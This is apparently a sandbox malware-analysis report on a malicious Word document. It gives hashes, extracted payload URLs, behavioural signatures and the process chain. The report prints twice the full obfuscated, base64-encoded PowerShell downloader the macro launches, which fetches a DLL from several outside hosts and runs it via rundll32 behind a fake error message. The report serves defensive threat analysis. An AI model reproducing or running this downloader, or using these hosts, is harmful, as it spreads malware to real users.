Analysis
-
max time kernel
139s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 11:54
Static task
static1
Behavioral task
behavioral1
Sample
Archivo 2020-R7352.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Archivo 2020-R7352.doc
Resource
win10v20201028
General
-
Target
Archivo 2020-R7352.doc
-
Size
159KB
-
MD5
b1c051ba9d0d7843ab2d42babb2b92d1
-
SHA1
90cb16b7cacb0536a6ca8fdea2da8cdb6be86ff1
-
SHA256
2e5599c71028de6a5c1202946484ff5020f38bb282b78e69aade9c840c3e2f24
-
SHA512
e9d304415157b1760c55e8784621396482908668905eebaf389959693725ba61397064f5fc21b31d8eb1cbbab64d88efa6232cba743f34d90dd1c7dd71ba7b4b
Malware Config
Extracted
https://familylifetruth.com/cgi-bin/PPq7/
https://coshou.com/wp-admin/EM/
https://www.todoensaludips.com/wp-includes/9/
https://dieuhoaxanh.vn/wp-admin/a/
http://cahyaproperty.bbtbatam.com/mhD/
http://depannage-vehicule-maroc.com/wp-admin/c/
https://techworldo.com/cgi-bin/gcZ/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 188 2128 cmd.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 20 2260 powershell.exe 23 2260 powershell.exe 31 2260 powershell.exe 33 2260 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3336 WINWORD.EXE 3336 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 188 wrote to memory of 2800 188 cmd.exe msg.exe PID 188 wrote to memory of 2800 188 cmd.exe msg.exe PID 188 wrote to memory of 2260 188 cmd.exe powershell.exe PID 188 wrote to memory of 2260 188 cmd.exe powershell.exe PID 2260 wrote to memory of 1776 2260 powershell.exe rundll32.exe PID 2260 wrote to memory of 1776 2260 powershell.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Archivo 2020-R7352.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwersheLL -w hidden -ENCOD UwBFAFQALQBWAGEAcgBJAEEAQgBsAGUAIAAgADgAaQBoADUANgA3ACAAIAAoACAAIABbAHQAWQBwAGUAXQAoACIAewAzAH0AewAwAH0AewA0AH0AewAyAH0AewAxAH0AIgAtAGYAJwBZAHMAVAAnACwAJwBSAGUAYwBUAE8AUgB5ACcALAAnAE0ALgBpAE8ALgBEAEkAJwAsACcAcwAnACwAJwBlACcAKQApADsAIAAgACAAUwBFAFQALQBJAHQAZQBtACAAKAAiAHYAQQAiACsAIgBSAGkAQQAiACsAIgBiAEwAZQA6AFIAIgArACIAaQAiACsAIgA3AHgATwAzACIAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsAMgB9AHsANQB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBGACAAJwBSACcALAAnAE0AYQBOAGEARwBFACcALAAnAFMAJwAsACcAVgBJAGMARQBQAG8ASQBuAHQAJwAsACcALgBuAGUAVAAuAHMARQByACcALAAnAFkAcwB0AGUAbQAnACkAIAApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAJwBTAGkAJwArACgAJwBsAGUAbgAnACsAJwB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AdAAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAHUAZQAnACkAKQA7ACQASAAwAHcAYwBmAG4AYwA9ACQAUAA1ADgAQgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWgAxADkAUgA7ACQAQgA1ADMATgA9ACgAKAAnAFMAJwArACcANwA3ACcAKQArACcASAAnACkAOwAgACAAKAAgACAAbABzACAAIABWAGEAcgBJAGEAQgBMAEUAOgA4AGkAaAA1ADYANwAgACAAKQAuAFYAYQBsAHUAZQA6ADoAIgBDAFIARQBBAHQAYABFAGAARABgAGkAUgBlAGMAVABPAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZQBOADcAUgByACcAKwAnADEAcwAnACsAJwBqADkAYQAnACsAJwBlAE4AJwApACsAJwA3ACcAKwAoACcAQgAnACsAJwBjAHgAJwApACsAKAAnADQAaQAnACsAJwBhAHkAZQAnACkAKwAnAE4ANwAnACkALgAiAHIAZQBQAGAATABhAGAAYwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAxACsAWwBDAEgAYQBSAF0ANwA4ACsAWwBDAEgAYQBSAF0ANQA1ACkALABbAHMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQApADsAJABWADUANwBSAD0AKAAoACcAQgAnACsAJwA0ADYAJwApACsAJwBWACcAKQA7ACAAKAB2AGEAUgBJAGEAQgBsAGUAIAAoACIAUgAiACsAIgBpACIAKwAiADcAeABPADMAIgApACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAQwB1AHIASQBgAFQAYAB5AFAAYABSAE8AYABUAG8AQwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFgANAA0AFMAPQAoACcAUwA4ACcAKwAnADEARAAnACkAOwAkAFAAYQAyAG4AdQByADQAIAA9ACAAKAAnAEsAJwArACgAJwBfADkAJwArACcATwAnACkAKQA7ACQATwA2ADYARwA9ACgAKAAnAEYAOAAnACsAJwA4ACcAKQArACcAVwAnACkAOwAkAEMAeQBnADAAawB1ADcAPQAkAEgATwBNAEUAKwAoACgAKAAnAGUAQQB3AFIAJwArACcAcgAnACkAKwAoACcAMQAnACsAJwBzAGoAOQBhAGUAQQAnACkAKwAoACcAdwAnACsAJwBCAGMAeAAnACkAKwAoACcANABpAGEAJwArACcAeQAnACsAJwBlAEEAJwApACsAJwB3ACcAKQAgAC0AcgBlAHAATABBAEMAZQAoACcAZQBBACcAKwAnAHcAJwApACwAWwBjAGgAYQBSAF0AOQAyACkAKwAkAFAAYQAyAG4AdQByADQAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEUAMAAxAEIAPQAoACcAUgA3ACcAKwAnAF8AUwAnACkAOwAkAE0AcgBrAGoAYwBpAG0APQAoACgAJwBdAGIAJwArACcAMgAnACkAKwAnAFsAcwAnACsAKAAnAHMAOgAvAC8AJwArACcAZgBhAG0AJwApACsAJwBpACcAKwAnAGwAJwArACcAeQAnACsAJwBsAGkAJwArACgAJwBmACcAKwAnAGUAdAAnACkAKwAoACcAcgB1AHQAJwArACcAaAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAGMAZwBpAC0AYgAnACkAKwAoACcAaQBuACcAKwAnAC8AUABQAHEANwAvACcAKwAnAEAAXQAnACsAJwBiADIAJwApACsAKAAnAFsAcwBzADoALwAnACsAJwAvACcAKQArACgAJwBjAG8AJwArACcAcwBoACcAKwAnAG8AdQAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQBuAC8AJwApACsAJwBFAE0AJwArACgAJwAvACcAKwAnAEAAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwBzADoAJwArACcALwAnACsAJwAvAHcAdwAnACkAKwAoACcAdwAuACcAKwAnAHQAJwApACsAKAAnAG8AZABvAGUAJwArACcAbgBzACcAKwAnAGEAbAAnACkAKwAoACcAdQAnACsAJwBkAGkAcAAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAHcAJwArACcAcAAtAGkAJwApACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZAAnACsAJwBlAHMAJwArACcALwA5AC8AQAAnACkAKwAnAF0AYgAnACsAKAAnADIAWwAnACsAJwBzAHMAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGQAaQBlAHUAJwApACsAKAAnAGgAbwBhACcAKwAnAHgAYQAnACsAJwBuACcAKQArACcAaAAuACcAKwAoACcAdgBuAC8AdwAnACsAJwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvAGEAJwArACcALwBAAF0AYgAnACsAJwAyAFsAcwA6ACcAKwAnAC8AJwApACsAJwAvAGMAJwArACcAYQBoACcAKwAoACcAeQBhACcAKwAnAHAAcgAnACkAKwAnAG8AJwArACgAJwBwAGUAJwArACcAcgB0AHkAJwApACsAJwAuACcAKwAnAGIAJwArACgAJwBiACcAKwAnAHQAYgBhACcAKwAnAHQAYQBtACcAKQArACcALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAG0AaABEACcAKwAnAC8AJwApACsAJwBAACcAKwAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwAnACsAJwA6AC8AJwArACcALwBkACcAKwAnAGUAcAAnACsAJwBhACcAKwAoACcAbgBuACcAKwAnAGEAJwApACsAJwBnAGUAJwArACgAJwAtAHYAZQAnACsAJwBoAGkAJwArACcAYwAnACkAKwAnAHUAJwArACcAbAAnACsAJwBlAC0AJwArACgAJwBtAGEAJwArACcAcgBvACcAKQArACgAJwBjAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAnAG4AJwArACgAJwAvAGMALwBAACcAKwAnAF0AJwApACsAKAAnAGIAJwArACcAMgBbAHMAcwA6AC8ALwB0ACcAKQArACcAZQBjACcAKwAnAGgAdwAnACsAJwBvACcAKwAnAHIAJwArACgAJwBsAGQAbwAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvAGMAZwAnACsAJwBpACcAKQArACcALQAnACsAJwBiACcAKwAoACcAaQBuAC8AZwAnACsAJwBjAFoAJwApACsAJwAvACcAKQAuACIAcgBFAFAAbABBAGAAYwBFACIAKAAoACcAXQBiACcAKwAoACcAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFQAMgA2AEEAIAArACAAJABIADAAdwBjAGYAbgBjACAAKwAgACQAQgA3ADUAUAApADsAJABXADcAMQBUAD0AKAAoACcAUAAnACsAJwA5ADMAJwApACsAJwBYACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgBzADYAbQBvADUAdwAgAGkAbgAgACQATQByAGsAagBjAGkAbQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAZQBjACcAKwAnAHQAJwApACAAcwBZAHMAdABlAE0ALgBuAGUAdAAuAFcARQBiAEMATABpAEUAbgB0ACkALgAiAEQATwB3AE4ATABvAEEAZABmAGAASQBgAEwAZQAiACgAJABGAHMANgBtAG8ANQB3ACwAIAAkAEMAeQBnADAAawB1ADcAKQA7ACQARwA3ADUAUQA9ACgAJwBXACcAKwAoACcAOAAnACsAJwBfAFIAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AGcAMABrAHUANwApAC4AIgBsAGAAZQBuAGcAdABoACIAIAAtAGcAZQAgADMAMAA1ADcANQApACAAewAuACgAJwByACcAKwAnAHUAbgBkAGwAbAAzADIAJwApACAAJABDAHkAZwAwAGsAdQA3ACwAKAAnAEMAbwAnACsAKAAnAG4AdAAnACsAJwByAG8AbABfAFIAdQAnACsAJwBuACcAKQArACgAJwBEACcAKwAnAEwATAAnACkAKQAuACIAVABgAG8AcwBUAHIAYABJAE4ARwAiACgAKQA7ACQAQgAyADkARAA9ACgAJwBaACcAKwAoACcANgAnACsAJwAyAFcAJwApACkAOwBiAHIAZQBhAGsAOwAkAEYAMgA2AEYAPQAoACcAVgAnACsAKAAnADMANwAnACsAJwBXACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKADEAXwBOAD0AKAAnAFQAMAAnACsAJwA4AEgAJwApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dll,Control_RunDLL3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dllMD5
c4bb6db0a01f8e518a6fd0b5b7bf7f9d
SHA1877c4c0d6ce8ff84de94accdecdcdaf977fb7f02
SHA256d994d7a09a15f70918bd707abd21a9cdaa93d3938972ebb6c98130b40fa9add2
SHA5120faf908ffb8eefffebd15e2d7e38833ecc2f2b136959886d3ec9f8ccdb92c5d5f6b391c54f481399c78219a4e9b0d7641e49c75c2ed00a9ab141b01d1acf583f
-
memory/1776-8-0x0000000000000000-mapping.dmp
-
memory/2260-4-0x0000000000000000-mapping.dmp
-
memory/2260-5-0x00007FFD7DF90000-0x00007FFD7E97C000-memory.dmpFilesize
9.9MB
-
memory/2260-6-0x000002E270350000-0x000002E270351000-memory.dmpFilesize
4KB
-
memory/2260-7-0x000002E270530000-0x000002E270531000-memory.dmpFilesize
4KB
-
memory/2800-3-0x0000000000000000-mapping.dmp
-
memory/3336-2-0x00007FFD84C50000-0x00007FFD85287000-memory.dmpFilesize
6.2MB